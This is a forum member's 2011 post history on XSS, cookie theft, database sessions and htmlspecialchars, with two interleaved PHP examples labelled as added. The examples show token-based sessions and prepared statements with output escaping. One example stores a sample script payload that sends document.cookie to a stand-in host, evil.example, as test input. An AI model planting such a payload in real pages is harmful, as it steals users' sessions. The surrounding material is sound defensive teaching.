
Messages - Dragooon
766
Off-topic / Re: Post-XSS scenarios and database driven sessions
« on June 21st, 2011, 02:24 AM »
Yes, it was one of my more useless posts. I'm burned out, haven't slept all night.
767
Off-topic / Re: Post-XSS scenarios and database driven sessions
« on June 21st, 2011, 02:16 AM »
Really. Really. htmlspecialchars.
768
Off-topic / Re: Post-XSS scenarios and database driven sessions
« on June 21st, 2011, 02:05 AM »
Ah so that's what the salt is for, didn't know that. Thanks :).
Quote
Let's be honest for a moment: the entire nature of cookies is a workaround for the fact that you want to represent some semblance of state over a protocol designed to be stateless.
Well that's true, and it's quite saddening knowing that there are ways to get around all this.
769
Off-topic / Re: Post-XSS scenarios and database driven sessions
« on June 21st, 2011, 01:53 AM »
Ah yeah. I didn't think of that. Plus HTTP security has a few issues and holes of its own. Since mine is a custom-made project and it contains a lot of sensitive information, I am very paranoid about security. Features be damned if a single security issue arises. Although since at the moment data can only be entered through our staff, XSS isn't a possibility, but we will be opening it to the public.

Oh, and in SMF's case, if a user got somebody's cookie, he or she can basically access his or her account, since passwords can be sent pre-SHA1'd.

So far, here are a few things I've thought of:
- IP checking (can't find a way around it)
- Small cookie time length
- Database check for cookie time length (the whole time thing can be spoofed)
- Storing a token instead of the password in the cookie
770
Off-topic / Re: Post-XSS scenarios and database driven sessions
« on June 21st, 2011, 01:38 AM »
Quote
Last question first. Database driven sessions help in shared host cases. By having them in your database tables, as opposed to a system-wide temporary folder, the odds of session poisoning or simple overwriting by accident are basically nil.
That's it? Well that's depressing...
Quote
That won't prevent you if you have URLs with the session in them, which can be scraped and are accessible to the current scripting context.
Would PHPSESSID count? I wouldn't think so.
771
Off-topic / Post-XSS scenarios and database driven sessions
« on June 21st, 2011, 12:45 AM »
I've been running post-XSS scenarios, and the obvious one is cookie stealing (perhaps the only use of XSS) and what happens after a cookie is stolen. The common protection is using sessions, and I've not been doing that, although can't that too be stolen, since it has to be tracked via a cookie? So is there a way to protect against a post-cookie-stealing scenario?

Also, how do database driven sessions help?
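The question above (post 771) and the list of mitigations in post 769 (token instead of password in the cookie, short lifetime, server-side expiry check, IP check) fit together in one piece of code. What follows is an added example, not SMF's code and not code from anyone in this thread: the cookie holds only a random token, the database holds a hash of that token together with the owner, the issuing IP and two timestamps, and every check runs server-side where the client cannot forge it. It uses an in-memory SQLite database so it runs on its own; the `sessions` table, its columns and the function names are this example's own assumptions.

```php
<?php
// Added example, not SMF's or the poster's code: a server-side session record keyed by a
// random token, so the cookie carries neither the password nor its hash. SQLite in memory
// so it runs stand-alone; the table, column and function names are this example's own.
declare(strict_types=1);

const IDLE_TTL     = 900;        // seconds of inactivity before the token dies ("small cookie time length")
const ABSOLUTE_TTL = 8 * 3600;   // hard cap regardless of activity

$pdo = new PDO('sqlite::memory:', null, null, [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
$pdo->exec('CREATE TABLE sessions (
    token_hash TEXT PRIMARY KEY,   -- SHA-256 of the cookie value, never the value itself
    user_id    INTEGER NOT NULL,
    ip         TEXT    NOT NULL,
    created_at INTEGER NOT NULL,
    last_seen  INTEGER NOT NULL
)');

// Log-in succeeded: mint 32 random bytes, hand the hex to the browser, keep only the hash.
// A dump of this table therefore does not yield cookies that log anyone in.
function issueSession(PDO $pdo, int $userId, string $clientIp, int $now): string
{
    $token = bin2hex(random_bytes(32));
    $stmt = $pdo->prepare('INSERT INTO sessions (token_hash, user_id, ip, created_at, last_seen)
                           VALUES (:h, :u, :ip, :c, :s)');
    $stmt->execute([
        ':h' => hash('sha256', $token), ':u' => $userId, ':ip' => $clientIp,
        ':c' => $now, ':s' => $now,
    ]);
    return $token;
}

function revokeSession(PDO $pdo, string $token): void
{
    $pdo->prepare('DELETE FROM sessions WHERE token_hash = :h')
        ->execute([':h' => hash('sha256', $token)]);
}

// Every request: look the token up by hash and apply the checks server-side, where the
// client cannot spoof them. Returns the user id, or null (and kills the record) on any failure.
function validateSession(PDO $pdo, string $token, string $clientIp, int $now): ?int
{
    $stmt = $pdo->prepare('SELECT user_id, ip, created_at, last_seen FROM sessions WHERE token_hash = :h');
    $stmt->execute([':h' => hash('sha256', $token)]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    if ($row === false) {
        return null;                                   // unknown or already revoked
    }
    $idle   = ($now - (int) $row['last_seen'])  > IDLE_TTL;
    $tooOld = ($now - (int) $row['created_at']) > ABSOLUTE_TTL;
    if ($idle || $tooOld || $row['ip'] !== $clientIp) {
        revokeSession($pdo, $token);                   // a replayed token takes the real session down with it
        return null;
    }
    $pdo->prepare('UPDATE sessions SET last_seen = :s WHERE token_hash = :h')
        ->execute([':s' => $now, ':h' => hash('sha256', $token)]);
    return (int) $row['user_id'];
}

// How the cookie would be sent from a real handler (not called in this CLI demo): HttpOnly keeps
// document.cookie from reading it, Secure keeps it off plain HTTP, and the expiry matches IDLE_TTL.
function sendSessionCookie(string $token, int $now): void
{
    setcookie('sess', $token, [
        'expires'  => $now + IDLE_TTL,
        'path'     => '/',
        'secure'   => true,
        'httponly' => true,
        'samesite' => 'Lax',
    ]);
}

// Demo with constructed values: log in, use the session, then replay the token from another address.
$now   = time();
$token = issueSession($pdo, 42, '203.0.113.5', $now);
var_dump(validateSession($pdo, $token, '203.0.113.5',  $now + 60));   // int(42)
var_dump(validateSession($pdo, $token, '198.51.100.9', $now + 120));  // NULL: IP mismatch, record deleted
var_dump(validateSession($pdo, $token, '203.0.113.5',  $now + 180));  // NULL: the legitimate user is logged out too
```

Two caveats a practitioner would want next to this. The IP check is the weakest of the four: users behind carrier NAT or on mobile change addresses and get logged out, and an attacker behind the same NAT, or one who simply makes requests from inside the victim's browser with the injected script, passes it. HttpOnly stops `document.cookie` from reading the token, but it does nothing against requests the script issues from the victim's own session; the server-side record, its short TTL and the ability to revoke it are what bound the damage once XSS has happened.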
772
Off-topic / Re: htmlspecialchars while inserting into DB
« on June 21st, 2011, 12:37 AM »
Thanks, I am using tox-g which explicitly uses htmlspecialchars in outputs, although I guess one can't be too secure.
773
Off-topic / Re: htmlspecialchars while inserting into DB
« on June 20th, 2011, 10:39 PM »
But do you htmlspecialchars them while inserting or while outputting? And do prepared statements automatically take care of escaping and security?
774
Off-topic / htmlspecialchars while inserting into DB
« on June 20th, 2011, 09:59 PM »
Does this make sense? I've been wondering, wouldn't mysql_real_escape be enough while appending to DB?
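The two questions in this thread (post 774: is `mysql_real_escape` enough on the way into the DB? post 773: escape on insert or on output, and do prepared statements handle escaping?) have one answer, shown here as an added example rather than code from tox-g, SMF or anyone in the thread. The SQL layer is protected by a prepared statement, which sends the value separately from the query text so no escaping function is needed; the HTML layer is protected by `htmlspecialchars` at the point of output, and only there. It uses an in-memory SQLite database so it runs on its own; the `posts` table, the function names and the sample payload are this example's own assumptions.

```php
<?php
// Added example, not code from the thread: the DB layer gets the raw text through a prepared
// statement (which replaces mysql_real_escape_string), and htmlspecialchars runs only at the
// moment the text is rendered as HTML. SQLite in memory so it runs stand-alone; the table and
// function names are this example's own.
declare(strict_types=1);

$pdo = new PDO('sqlite::memory:', null, null, [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
$pdo->exec('CREATE TABLE posts (id INTEGER PRIMARY KEY, body TEXT NOT NULL)');

// Bound parameters travel separately from the SQL text, so a quote in $body cannot close the
// literal and append SQL. Nothing is escaped here: the database stores exactly what was typed.
function insertPost(PDO $pdo, string $body): int
{
    $stmt = $pdo->prepare('INSERT INTO posts (body) VALUES (:body)');
    $stmt->execute([':body' => $body]);
    return (int) $pdo->lastInsertId();
}

function fetchPost(PDO $pdo, int $id): string
{
    $stmt = $pdo->prepare('SELECT body FROM posts WHERE id = :id');
    $stmt->execute([':id' => $id]);
    $body = $stmt->fetchColumn();
    return $body === false ? '' : (string) $body;
}

// HTML output encoding for text nodes and double-quoted attributes. ENT_QUOTES also covers
// single quotes; the charset is explicit so a default of ISO-8859-1 cannot change the result.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Constructed input: the cookie-stealing payload the thread is worried about, plus a quote
// that would have been an SQL injection attempt with string-concatenated queries.
$payload = "<script>location='http://evil.example/?c='+document.cookie</script> O'Brien";
$id = insertPost($pdo, $payload);

// 1. Rendered as HTML: the tag is shown as text, not executed.
echo '<div class="post">' . h(fetchPost($pdo, $id)) . "</div>\n";

// 2. Rendered as JSON for an API client: no HTML encoding wanted, and none is baked in,
//    because the database holds the original text.
echo json_encode(['body' => fetchPost($pdo, $id)], JSON_THROW_ON_ERROR) . "\n";

// 3. What escaping on insert costs: the stored copy is already HTML, so the output escape
//    that every template still has to apply double-encodes it and the page shows &lt;script&gt; literally.
$storedEscaped = h($payload);              // as if htmlspecialchars had run before the INSERT
echo h($storedEscaped) . "\n";
```

The point of case 3 is that escaping belongs to the consumer, not the producer: the database does not know whether a row will end up in an HTML page, a JSON response or a plain-text e-mail, so it should hold the original text, and each output path applies its own encoding. `mysql_real_escape_string` only ever guarded the SQL layer (and the `mysql_*` extension it belongs to is gone as of PHP 7); it never did anything for XSS, and with bound parameters it is not needed for SQL either.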
775
FAQs / [FAQ] Re: Minimum requirements
« on June 19th, 2011, 08:51 PM »
Mhmm....game...fancy shadows.......Crysis!

Although I agree, Flash being a requirement is ridiculous even when the general shift is against it. It being recommended is totally reasonable though.
776
FAQs / [FAQ] Re: Minimum requirements
« on June 19th, 2011, 07:07 PM »
That is only for mass upload, and that can be replaced with the newer JavaScript File API since it supports upload progress.
777
Off-topic / Re: I'm a Dad!
« on June 19th, 2011, 12:43 PM »
Congratulations!
778
Features: Theming / Re: Template blocks
« on June 19th, 2011, 12:42 PM »
Actually AFAIK it is using a far simpler concept, basically search and replace at session rewrite based on defined patterns in template_init.
779
The Pub / Re: Interesting site
« on June 18th, 2011, 08:51 PM »
Welcome! :)
780
Off-topic / Re: A PHP fork?
« on June 16th, 2011, 09:56 PM »
I use $_REQUEST all the time :P.

It's a nice PHP fork with a few nifty features, but I don't see myself switching to it or giving it a shot, honestly.